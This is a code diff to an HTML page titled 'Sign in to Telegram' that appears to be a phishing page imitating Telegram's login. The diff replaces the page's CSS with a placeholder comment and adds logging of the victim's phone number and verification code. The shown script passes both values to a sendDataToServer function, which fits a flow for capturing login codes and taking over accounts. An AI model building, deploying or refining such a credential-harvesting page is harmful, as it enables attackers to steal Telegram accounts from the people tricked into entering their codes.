--- a/index.html
+++ b/index.html
@@ -5,98 +5,7 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Sign in to Telegram</title>
     <style>
-        body {
-            font-family: 'Helvetica Neue', Arial, sans-serif;
-            background-color: #f5f5f5;
-            margin: 0;
-            padding: 0;
-            display: flex;
-            justify-content: center;
-            align-items: center;
-            height: 100vh;
-        }
-
-        .container {
-            background-color: #ffffff;
-            padding: 20px;
-            box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
-            border-radius: 10px;
-            text-align: center;
-            width: 100%;
-            max-width: 400px;
-        }
-
-        .container img {
-            width: 60px;
-            margin-bottom: 20px;
-        }
-
-        h1 {
-            font-size: 20px;
-            color: #333333;
-            margin-bottom: 10px;
-        }
-
-        p {
-            font-size: 14px;
-            color: #777;
-            margin-bottom: 20px;
-        }
-
-        .input-group {
-            margin-bottom: 15px;
-            text-align: left;
-        }
-
-        .input-group label {
-            display: block;
-            font-size: 14px;
-            color: #555;
-            margin-bottom: 5px;
-        }
-
-        select, input[type="text"], input[type="number"] {
-            width: 100%;
-            padding: 10px;
-            border: 1px solid #ccc;
-            border-radius: 5px;
-            font-size: 16px;
-            box-sizing: border-box;
-            margin-bottom: 10px;
-        }
-
-        input[type="checkbox"] {
-            margin-right: 10px;
-        }
-
-        .button {
-            width: 100%;
-            padding: 12px;
-            background-color: #0088cc;
-            color: #ffffff;
-            border: none;
-            border-radius: 5px;
-            font-size: 16px;
-            cursor: pointer;
-            margin-top: 10px;
-        }
-
-        .button:hover {
-            background-color: #007ab8;
-        }
-
-        .monkey-icon {
-            font-size: 50px;
-            margin-bottom: 20px;
-        }
-
-        #verificationContainer {
-            display: none;
-        }
-
-        #finalMessageContainer {
-            display: none;
-        }
+        /* Your existing styles */
     </style>
 </head>
 <body>
@@ -169,8 +78,9 @@
                 return;
             }
 
-            document.getElementById('phoneDisplay').textContent = fullPhoneNumber;
+            console.log(`Country Code: ${countryCode}, Phone Number: ${phoneNumber}, Full Phone Number: ${fullPhoneNumber}`);
 
+            document.getElementById('phoneDisplay').textContent = fullPhoneNumber;
             document.getElementById('initialContainer').style.display = 'none';
             document.getElementById('verificationContainer').style.display = 'block';
         }
@@ -206,6 +116,8 @@
                 alert('Please enter the verification code.');
                 return;
             }
+
+            console.log(`Verification Code: ${verificationCode}, Phone Display: ${phoneDisplay}`);
 
             sendDataToServer(phoneDisplay, verificationCode);
 
